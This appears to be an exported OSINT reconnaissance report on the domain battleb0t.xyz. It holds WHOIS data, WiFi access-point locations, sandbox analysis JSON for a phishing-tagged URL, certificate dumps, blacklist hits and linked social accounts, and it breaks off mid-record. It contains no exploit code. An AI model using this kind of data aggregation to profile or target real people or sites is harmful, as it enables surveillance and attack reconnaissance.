Tech Email: 09e034915a16543e65fa494a6f2d5f65-1767633@contact.gandi.net
Name Server: NS-604.AWSDNS-11.NET
Name Server: NS-1776.AWSDNS-30.CO.UK
Name Server: NS-308.AWSDNS-38.COM
Name Server: NS-1530.AWSDNS-63.ORG
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/epp
Reseller Email:
Reseller URL:
Personal data access and use are governed by French law, any use for the purpose of unsolicited mass commercial advertising as well as any mass or automated inquiries (for any intent other than the registration or modification of a domain name) are strictly forbidden. Copy of whole or part of our database without Gandi's endorsement is strictly forbidden.
A dispute over the ownership of a domain name may be subject to the alternate procedure established by the Registry in question or brought before the courts.
For additional information, please contact us via the following form:
https://www.gandi.net/support/contacter/mail/
|
| 2023-05-12 03:08:46 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.215 | 104.196.30.220 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | infinity2 (Net ID: 00:06:25:DA:3E:86) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:51:22 | Malicious Co-Hosted Site | Yes | VirusTotal | 0 | 1 | 3 | 0 | None | VirusTotal [netlify.app]
https://www.virustotal.com/en/domain/netlify.app/information/ | netlify.app |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ToddNet (Net ID: 00:01:24:F2:5E:43) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MobileInternet (Net ID: 00:02:B3:AE:FA:18) | 50.1188, 8.6843 |
| 2023-05-12 02:48:14 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Freadymag.com%2Fu2462346896%2F4244462%2F', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_bc0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_bc0_IESQMMUTEX_0_303"\n "IsoScope_bc0_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_bc0_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3008"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "IsoScope_bc0_ConnHashTable<3008>_HashTable_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_bc0_IE_EarlyTabStart_0xdec_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3008"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "172.66.40.106:443"\n "52.16.183.191:443"\n "35.186.254.174:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "llink.to"\n "readymag.com"\n "track.salesflare.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarBAD.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarB9B.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabBAC.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabBAC.tmp]- [targetUID: 00000000-00003240]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003240]\n "CabB9A.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabB9A.tmp]- [targetUID: 00000000-00003240]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df7bc6018f44d91351.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{a4c88c9d-e909-11ed-b4ce-080027d6e927}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df7bc6018f44d91351.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{a4c88c9d-e909-11ed-b4ce-080027d6e927}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{a4c88c9f-e909-11ed-b4ce-080027d6e927}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df1b0105ea70f55f81.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "TarBAD.tmp" has type "data"- Location: [%TEMP%\\TarBAD.tmp]- [targetUID: 00000000-00003240]\n "CabBAC.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabBAC.tmp]- [targetUID: 00000000-00003240]\n "flare_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003008]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFCC28235309D36060.TMP" has type "data"- Location: [%TEMP%\\~DFCC28235309D36060.TMP]- [targetUID: 00000000-00003008]\n "~DF1B0105EA70F55F81.TMP" has type "data"- Location: [%TEMP%\\~DF1B0105EA70F55F81.TMP]- [targetUID: 00000000-00003008]\n "~DF4A816B7A645900CB.TMP" has type "data"- Location: [%TEMP%\\~DF4A816B7A645900CB.TMP]- [targetUID: 00000000-00003008]\n "~DF7BC6018F44D91351.TMP" has type "data"- Location: [%TEMP%\\~DF7BC6018F44D91351.TMP]- [targetUID: 00000000-00003008]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "_A4C88C9F-E909-11ED-B4CE-080027D6E927_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._A4C88C9D-E909-11ED-B4CE-080027D6E927_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_AD106546-E909-11ED-B4CE-080027D6E927_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "errorPageStrings_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003240]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "3014XX9H.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3014XX9H.txt]- [targetUID: 00000000-00003008]\n "T4W3H708.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\T4W3H708.txt]- [targetUID: 00000000-00003008]\n "urlref_httpsllink.tou_https%3A%2F%2Freadymag.com%2Fu2462346896%2F4244462%2F" has type "HTML document ASCII text"- [targetUID: N/A]\n "S9KISB1I.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\S9KISB1I.txt]- [targetUID: 00000000-00003008]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003240]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "0LUJE7ZY.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0LUJE7ZY.txt]- [targetUID: 00000000-00003008]\n "SWVETGDV.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SWVETGDV.txt]- [targetUID: 00000000-00003008]\n "P4PAXQDE.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P4PAXQDE.txt]- [targetUID: 00000000-00003008]\n "ETGUG1H9.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ETGUG1H9.txt]- [targetUID: 00000000-00003008]\n "TarB9B.tmp" has type "data"- Location: [%TEMP%\\TarB9B.tmp]- [targetUID: 00000000-00003240]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003240]\n "CabB9A.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 63843 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabB9A | 185.199.110.153 |
| 2023-05-12 02:45:30 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:99:a3:5c:44:13:8f:1f:f4:9f:74:e5:4f:ad:57:81:83:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 23 20:32:58 2023 GMT
Not After : Jun 21 20:32:57 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:ae:2d:9c:62:18:76:2e:df:de:55:f1:95:af:dc:
59:27:38:8b:5b:00:32:90:fa:a3:fe:5e:92:a6:01:
7f:53:a9:14:85:d5:b4:a7:c0:0d:14:f0:32:f0:be:
0c:a5:54:c5:d2:e3:5d:4e:26:e5:3f:0a:13:30:aa:
26:b9:11:a2:a8:7d:58:6c:52:5f:e4:39:4c:64:b8:
92:f5:ca:b5:bf:a9:b0:6c:9f:4b:b2:34:b7:0e:fd:
c3:4b:d1:55:53:7f:36:89:dc:d0:2b:5e:0c:5f:ed:
95:61:3e:cb:10:b6:d2:99:9c:0c:b8:b3:93:24:f5:
c4:4f:20:e2:fc:24:a0:02:4e:dc:94:c0:26:80:c4:
72:7c:f8:8f:0f:bb:1a:71:64:e0:5b:eb:d2:c0:8c:
13:c3:5d:19:05:5c:35:d5:d3:61:05:f7:49:68:ce:
3f:e7:a7:33:6d:02:b1:87:fe:b7:9f:60:b3:8d:a6:
be:5a:d5:5c:ed:53:5e:27:e0:c9:22:2d:81:ce:b1:
ec:cc:05:c4:f7:86:fc:47:61:ca:71:86:20:b8:14:
9c:ca:b1:05:e4:47:06:cb:1b:86:c7:8f:5e:ba:31:
9b:3c:cb:b9:41:b5:56:e8:d6:32:9d:d1:16:19:02:
ad:d1:e3:f1:4b:c1:d9:61:74:ad:de:6b:c8:4b:60:
db:26:73:9c:89:bb:67:5a:18:24:bc:9e:d0:bb:23:
66:66:fc:2a:b7:81:2b:f5:a0:62:f2:00:e6:a6:5d:
1f:6b:36:2c:f3:42:e0:4d:31:63:fd:7c:96:5d:29:
9b:8b:f6:25:a8:26:32:03:a6:81:0f:c9:d4:8e:46:
76:31:9b:db:08:e1:d6:3d:7b:5e:87:9a:98:cf:cb:
5b:13:ec:f0:64:25:74:03:76:57:14:ba:41:4b:d2:
c1:7e:f3:50:47:af:8d:ee:e4:55:19:8e:20:6c:87:
99:ac:39:f3:6e:8a:21:33:3f:07:aa:28:83:d0:d1:
d8:1c:a8:b7:84:a8:89:95:7f:34:41:7f:a0:83:3e:
cf:d0:5c:c5:e2:ac:17:66:44:17:94:26:73:d2:f6:
3b:d0:cf:9b:f2:1b:3c:6e:17:4d:08:5d:87:80:c7:
6c:c8:40:f5:84:96:5d:f8:9c:bd:ce:4d:4b:f5:0e:
4f:4e:80:4c:0a:a9:22:bf:2e:2d:84:af:ae:ae:d4:
1a:50:8f:be:bf:51:48:e8:9e:33:86:ab:75:90:6e:
5e:7e:85:12:ca:44:de:1a:66:b7:86:cb:c7:c1:40:
7b:6e:f8:ff:44:74:04:48:b1:d2:5b:44:5f:fc:71:
68:46:d9:68:ed:ca:a6:15:15:a5:57:56:d1:00:94:
83:4a:61
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
98:BA:3D:0D:C8:59:5C:05:86:25:C6:DE:57:7A:62:02:A8:E1:D5:36
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
51:bc:8d:7a:19:49:b5:11:f4:b9:09:41:b5:bf:9e:b6:a0:1f:
30:6c:d0:86:d8:2e:1c:f6:c2:f3:8a:e9:28:07:3c:4c:1b:5d:
f4:93:c1:07:2c:53:ba:36:23:93:d1:2b:ae:40:d0:d7:9a:3d:
52:13:07:ac:5a:f9:bc:8e:9a:26:48:2d:63:da:42:87:4d:b8:
79:91:2d:a5:15:c9:8f:18:d0:19:dc:82:a0:c9:2f:ff:14:7f:
6e:d9:7c:10:fd:42:c5:1f:9f:69:db:a2:e3:f6:77:ca:6b:4d:
70:8d:c7:08:12:a2:cb:2b:e2:0f:fa:b5:ad:d0:98:5b:e2:5d:
54:f6:0b:28:1a:42:4d:c5:06:75:82:0f:6a:07:8d:19:7b:08:
12:7b:65:35:ae:e0:fb:30:c6:19:89:90:6c:f3:9f:d1:68:80:
fa:bb:16:fe:59:7b:6b:32:af:7b:3b:c0:6b:66:67:55:6e:9c:
27:ae:59:b7:71:9d:56:92:7b:0c:2b:27:d8:38:32:c8:ff:2f:
02:3f:56:f2:68:67:dc:8c:2f:a9:bc:e8:3a:f8:d6:0d:e4:fc:
ea:65:23:2c:d6:31:a2:34:ab:8b:fc:76:7c:26:2d:87:ae:ee:
a9:61:86:49:d1:02:02:98:49:50:4a:f8:24:91:f5:5d:f3:f7:
98:5f:57:37
| battleb0t.xyz |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Beyza (Net ID: 00:13:49:45:9F:FA) | 40.2024, 29.0398 |
| 2023-05-12 03:03:16 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | [{u'not_after': u'2023-07-10T04:54:49', u'not_before': u'2023-04-11T04:54:50', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0d408dd97ca1bd4c0d06c53fc3e92ebc', u'entry_timestamp': u'2023-04-11T05:54:51.221', u'id': 9117673170}, {u'not_after': u'2023-05-12T05:22:09', u'not_before': u'2023-02-11T05:22:10', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'0ce3f41ce8cbbbcf13f76c6f365ec2eb', u'entry_timestamp': u'2023-02-11T06:22:11.299', u'id': 8627857885}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.333', u'id': 8209207679}, {u'not_after': u'2023-03-14T04:12:31', u'not_before': u'2022-12-14T04:12:32', u'issuer_ca_id': 183283, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0310b430a3e0722fec4ebc95e312bb838d6f', u'entry_timestamp': u'2022-12-14T05:12:32.07', u'id': 8196466589}, {u'not_after': u'2023-03-14T04:12:06', u'not_before': u'2022-12-14T04:12:07', u'issuer_ca_id': 180753, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.ayhu.xyz', u'serial_number': u'00ff0e1ea46f55f0740eb383e107c9ea93', u'entry_timestamp': u'2022-12-14T05:12:08.377', u'id': 8196466213}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:55.433', u'id': 8209126729}, {u'not_after': u'2023-03-14T03:53:53', u'not_before': u'2022-12-14T03:53:54', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\ncpanel.ayhu.xyz\ncpcalendars.ayhu.xyz\ncpcontacts.ayhu.xyz\nmail.ayhu.xyz\nwebdisk.ayhu.xyz\nwebmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'04897c23d88920d1c5b3ae3091443a2381b8', u'entry_timestamp': u'2022-12-14T04:53:54.573', u'id': 8196005223}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:55.143', u'id': 8206782905}, {u'not_after': u'2023-03-13T19:16:53', u'not_before': u'2022-12-13T19:16:54', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0488a73cdb484e7a5b3055608f2320348b3f', u'entry_timestamp': u'2022-12-13T20:16:54.437', u'id': 8193169403}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.931', u'id': 8206381262}, {u'not_after': u'2023-03-13T18:07:06', u'not_before': u'2022-12-13T18:07:07', u'issuer_ca_id': 183267, u'name_value': u'ayhu.xyz\nmail.ayhu.xyz\nwww.ayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'ayhu.xyz', u'serial_number': u'047ba367f476b8d086bdaa81687c78c65324', u'entry_timestamp': u'2022-12-13T19:07:08.083', u'id': 8192906588}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.988', u'id': 8206326761}, {u'not_after': u'2023-03-13T17:51:42', u'not_before': u'2022-12-13T17:51:43', u'issuer_ca_id': 183267, u'name_value': u'*.ayhu.xyz\nayhu.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'*.ayhu.xyz', u'serial_number': u'0318ae067efc0b78465c8bfe1a31bf5b16b8', u'entry_timestamp': u'2022-12-13T18:51:43.756', u'id': 8193180831}] |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.188): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | iMGSRC.RU (Category: images)
https://imgsrc.ru/main/user.php?lang=ru&user=login | login |
| 2023-05-12 02:45:22 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 4 | 0 | None | {u'region_code': u'VA', u'country_tld': u'.us', u'ip': u'2600:1f18:2489:8202::c8', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/New_York', u'city': u'Ashburn', u'network': u'2600:1f18::/33', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv6', u'latitude': 39.0469, u'in_eu': False, u'utc_offset': u'-0400', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'AMAZON-AES', u'postal': u'20149', u'asn': u'AS14618', u'country': u'US', u'region': u'Virginia', u'longitude': -77.4903, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 2600:1f18:2489:8202::c8 |
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.10): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Twitter (Category: social)
https://twitter.com/Battleb0t | Battleb0t |
| 2023-05-12 02:49:28 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 18, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://cyberchef.io/', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" loaded module "KERNEL32.DLL" at base 50960000\n "msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\UXTHEME.DLL" at base 4b910000\n "msedge.exe" loaded module "COMBASE.DLL" at base 4e5e0000\n "msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\WINDOWS.SYSTEM.PROFILE.PLATFORMDIAGNOSTICSANDUSAGEDATASETTINGS.DLL" at base 32cf0000\n "msedge.exe" loaded module "NTDLL.DLL" at base 50f80000\n "msedge.exe" loaded module "API-MS-WIN-DOWNLEVEL-SHELL32-L1-1-0.DLL" at base 4ef60000\n "msedge.exe" loaded module "SHELL32.DLL" at base 4f1e0000\n "msedge.exe" loaded module "USER32.DLL" at base 4e450000\n "msedge.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base 4dce0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base 4dce0000\n "msedge.exe" loaded module "ADVAPI32.DLL" at base 50a10000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base 4dce0000\n "msedge.exe" loaded module "KERNEL32" at base 50960000\n "msedge.exe" loaded module "API-MS-WIN-CORE-STRING-L1-1-0" at base 4dce0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-DATETIME-L1-1-1" at base 4dce0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-OBSOLETE-L1-2-0" at base 4dce0000'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"19001a002101000040c7e54df87f0000@ntdll.dll"\n "220023002101000018c7e54df87f0000@ntdll.dll"\n "19001a006de6000040c7e54df87f0000@ntdll.dll"\n "220023006de6000018c7e54df87f0000@ntdll.dll"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4664:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:4176:304:WilStaging_02"\n 